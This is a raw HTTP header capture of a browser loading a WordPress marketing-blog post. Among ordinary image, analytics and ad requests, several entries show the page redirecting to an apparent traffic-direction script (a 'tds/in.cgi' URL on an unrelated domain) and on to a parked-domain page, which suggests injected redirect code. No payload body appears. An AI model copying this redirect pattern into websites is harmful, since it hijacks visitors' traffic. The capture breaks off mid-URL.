Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP=&quot;CAO PSA OUR&quot;
Set-Cookie: SessionID=706eac1f-f1fa-478e-90ea-1a1bcd222474; path=/ VisitorID=ebe7e48f-2c1c-4716-a346-61310a5e44cb&amp;Exp=11/16/2015 12:24:44 PM; expires=Mon, 16-Nov-2015 20:24:44 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 4055
GET /rf/banners/seobook-300x250.gif HTTP/1.1

Host: www.seobook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 18 Feb 2008 18:46:25 GMT
Etag: &quot;a71795-5d9e-446732c48e240&quot;
Cache-Control: max-age=1209600
Expires: Sat, 17 Nov 2012 19:22:10 GMT
Content-Length: 23966
Accept-Ranges: bytes
Date: Fri, 16 Nov 2012 20:24:42 GMT
X-Varnish: 110793607 94998454
Age: 1126952
Via: 1.1 varnish
Connection: keep-alive
GET /0852/10422100-10.gif HTTP/1.1

Host: www.yceml.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Resin/3.1.8
Content-Length: 8561
nnCoection: close
Cache-Control: max-age=510313
Expires: Thu, 22 Nov 2012 18:09:55 GMT
Date: Fri, 16 Nov 2012 20:24:42 GMT
Connection: keep-alive
GET /0655/10456719-14.gif HTTP/1.1

Host: www.yceml.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Resin/3.1.8
Content-Length: 13788
Cneonction: close
Cache-Control: max-age=510313
Expires: Thu, 22 Nov 2012 18:09:55 GMT
Date: Fri, 16 Nov 2012 20:24:42 GMT
Connection: keep-alive
GET /wp-content/themes/meridian/images/bg.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:11 GMT
Accept-Ranges: bytes
Content-Length: 6524
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/menu-divider.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:26 GMT
Accept-Ranges: bytes
Content-Length: 365
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/search.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:36 GMT
Accept-Ranges: bytes
Content-Length: 499
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/bg-top.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:11 GMT
Accept-Ranges: bytes
Content-Length: 457
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/menu-bg.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:25 GMT
Accept-Ranges: bytes
Content-Length: 367
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive
GET /__utm.gif?utmwv=1.4&utmn=500547520&utmcs=UTF-8&utmsr=1176x885&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmcn=1&utmdt=Google%20Hot%20Trends%20On%20USA%20Election%20Day%2C%202008%20-%20Business%20Web%20Site%20Marketing%20Talk&utmhn=www.meridiancrest.com&utmhid=441926862&utmr=-&utmp=/google-hot-trends-on-usa-election-day-2008/&utmac=UA-3658856-1&utmcc=__utma%3D219600389.500547520.1353097483.1353097483.1353097483.1%3B%2B__utmz%3D219600389.1353097483.1.1.utmccn%3D(direct)%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)%3B%2B HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=1.4&amp;utmn=500547520&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmcn=1&amp;utmdt=Google%20Hot%20Trends%20On%20USA%20Election%20Day%2C%202008%20-%20Business%20Web%20Site%20Marketing%20Talk&amp;utmhn=www.meridiancrest.com&amp;utmhid=441926862&amp;utmr=-&amp;utmp=/google-hot-trends-on-usa-election-day-2008/&amp;utmac=UA-3658856-1&amp;utmcc=__utma%3D219600389.500547520.1353097483.1353097483.1353097483.1%3B%2B__utmz%3D219600389.1353097483.1.1.utmccn%3D(direct)%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)%3B%2B HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 11:57:54 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 30408
Server: GFE/2.0
GET /wp-content/themes/meridian/images/box-right.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:11 GMT
Accept-Ranges: bytes
Content-Length: 354
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/post-top.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:30 GMT
Accept-Ranges: bytes
Content-Length: 354
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/main-inner.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:25 GMT
Accept-Ranges: bytes
Content-Length: 508
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/post-info.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:28 GMT
Accept-Ranges: bytes
Content-Length: 363
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/comment-bubble.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:12 GMT
Accept-Ranges: bytes
Content-Length: 1563
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive
GET /tds/in.cgi?3&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&default_keyword=notdefine HTTP/1.1

Host: itsallbreaksoft.net
GET /tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
Cookie: SessionID=706eac1f-f1fa-478e-90ea-1a1bcd222474; VisitorID=ebe7e48f-2c1c-4716-a346-61310a5e44cb&amp;Exp=11/16/2015 12:24:44 PM
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP=&quot;CAO PSA OUR&quot;
Set-Cookie: SessionID=706eac1f-f1fa-478e-90ea-1a1bcd222474; path=/ VisitorID=ebe7e48f-2c1c-4716-a346-61310a5e44cb&amp;Exp=11/16/2015 12:24:44 PM; expires=Mon, 16-Nov-2015 20:24:44 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 4055
GET /wp-content/themes/meridian/images/header.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:23 GMT
Accept-Ranges: bytes
Content-Length: 55502
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/sb-heading.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:30 GMT
Accept-Ranges: bytes
Content-Length: 365
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/footer-top-inner.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:20 GMT
Accept-Ranges: bytes
Content-Length: 6063
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/footer-bg.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:18 GMT
Accept-Ranges: bytes
Content-Length: 567
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/footer-divider.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:19 GMT
Accept-Ranges: bytes
Content-Length: 1009
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive
GET /images/template/360x318/ist2_746781_female_student.jpg HTTP/1.1

Host: i.nuseek.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
HTTP/1.1 200 OK

Content-Type: image
Content-Length: 20765
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=48317
Date: Fri, 16 Nov 2012 20:24:43 GMT
Connection: keep-alive
GET /wp-content/themes/meridian/images/footer-rss-input.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:43 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:19 GMT
Accept-Ranges: bytes
Content-Length: 1332
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/footer-rss-subscribe.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:43 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:19 GMT
Accept-Ranges: bytes
Content-Length: 3513
Keep-Alive: timeout=5, max=67
Connection: Keep-Alive
GET /js/standard.js?rte=1&tm=2&dn=itsallbreaksoft.net&tid=101604 HTTP/1.1

Host: itsallbreaksoft.net
GET /js/standard.js?rte=1&amp;tm=2&amp;dn=itsallbreaksoft.net&amp;tid=101604 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: SessionID=706eac1f-f1fa-478e-90ea-1a1bcd222474; VisitorID=ebe7e48f-2c1c-4716-a346-61310a5e44cb&amp;Exp=11/16/2015 12:24:44 PM
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Cache-Control: private
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 569
GET /images/misc/blank.gif HTTP/1.1

Host: i.nuseek.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
HTTP/1.1 200 OK

Content-Type: image
Content-Length: 43
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=32030
Date: Fri, 16 Nov 2012 20:24:43 GMT
Connection: keep-alive
GET /wp-content/themes/meridian/images/footer-rss.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/wp-content/themes/meridian/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:20 GMT
Accept-Ranges: bytes
Content-Length: 18219
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive
GET /sd?s=124463&f=1 HTTP/1.1

Host: as.casalemedia.com
GET /sd?s=124463&amp;f=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=iso-8859-1
Server: Apache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Location: http://as.casalemedia.com/sd?s=124463&amp;f=1&amp;C=1
Content-Length: 237
Expires: Fri, 16 Nov 2012 20:24:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 16 Nov 2012 20:24:43 GMT
Connection: keep-alive
Set-Cookie: CMID=jtS1x0PS1I0AAFzn4NQAAABh;domain=casalemedia.com;path=/;expires=Sat, 16 Nov 2013 20:24:43 GMT CMPS=134;domain=casalemedia.com;path=/;expires=Thu, 14 Feb 2013 20:24:43 GMT CMPP=008;domain=casalemedia.com;path=/;expires=Thu, 14 Feb 2013 20:24:43 GMT
GET /css/style.css?rte=1&tm=2&dn=itsallbreaksoft.net&tid=101604&def=Akamai%3aHostingURL%3dhttp%3a%2f%2fi.nuseek.com%7cParking%3aSkinPath%3divyleague%7cBdyStyl%3aPageBackgroundColor%3d%23fff%7cBdyStyl%3aFont%3darial%7cBdyStyl%3aFontSize%3d12%7cBdyStyl%3aFontColor%3d%230e5fd8%7cBdyStyl%3aPrimaryColor%3d%231b5709%7cBdyStyl%3aPrimaryColorComplement%3d%23fff%7cBdyStyl%3aSecondaryColor%3d%23c44242%7cBdyStyl%3aSecondaryColorComplement%3d%23edc6c6%7cBdyStyl%3aTertiaryColor%3d%23f3f3f3%7cBdyStyl%3aTertiaryColorComplement%3d%23476ec7%7cPgHdr%3aFontSize%3d18%7cPgHdr%3aFont%3dVerdana%7cRelLink%3aFont%3darial%7cRelLink%3aFontSize%3d14%7cRelLink%3aFontColor%3d%23476ec7%7cRelLink%3aHoverFontColor%3d%23c03625%7cRelLink%3aBackgroundColor%3d%23fafad9%7cRelLink%3aDividerColor%3d%23e2dfb8%7cRelLink%3aHoverBackgroundColor%3d%23fbfbf5%7cRelLink%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cRelLink%3aImageWidth%3d10%7cRelLink%3aImageHeight%3d10%7cBottomNav%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets_9x9%2f0006.gif%7cResult%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cResult%3aHeaderFont%3darial%7cResult%3aHeaderFontSize%3d12%7cResult%3aHeaderFontColor%3d%23000%7cResult%3aTitleFont%3darial%7cResult%3aTitleFontSize%3d16%7cResult%3aTitleFontColor%3d%2300c%7cResult%3aAbstractFont%3darial%7cResult%3aAbstractFontSize%3d12%7cResult%3aAbstractFontColor%3d%23000%7cResult%3aURLFont%3darial%7cResult%3aURLFontSize%3d12%7cResult%3aURLFontColor%3d%23008000%7cResult%3aSidebarBorderColor%3d%23ccc%7cSrchBox%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbuttons%2f0006.gif%7cSrchBox%3aImageWidth%3d60%7cSrchBox%3aImageHeight%3d22%7cSrchBox%3aAlign%3dright%7cSearchLinkGroup%3aHoverLinkColor%3d%23ff9%7cUsrCust%3aFontType%3dverdana%7cUsrCust%3aFontSize%3d11%7cUsr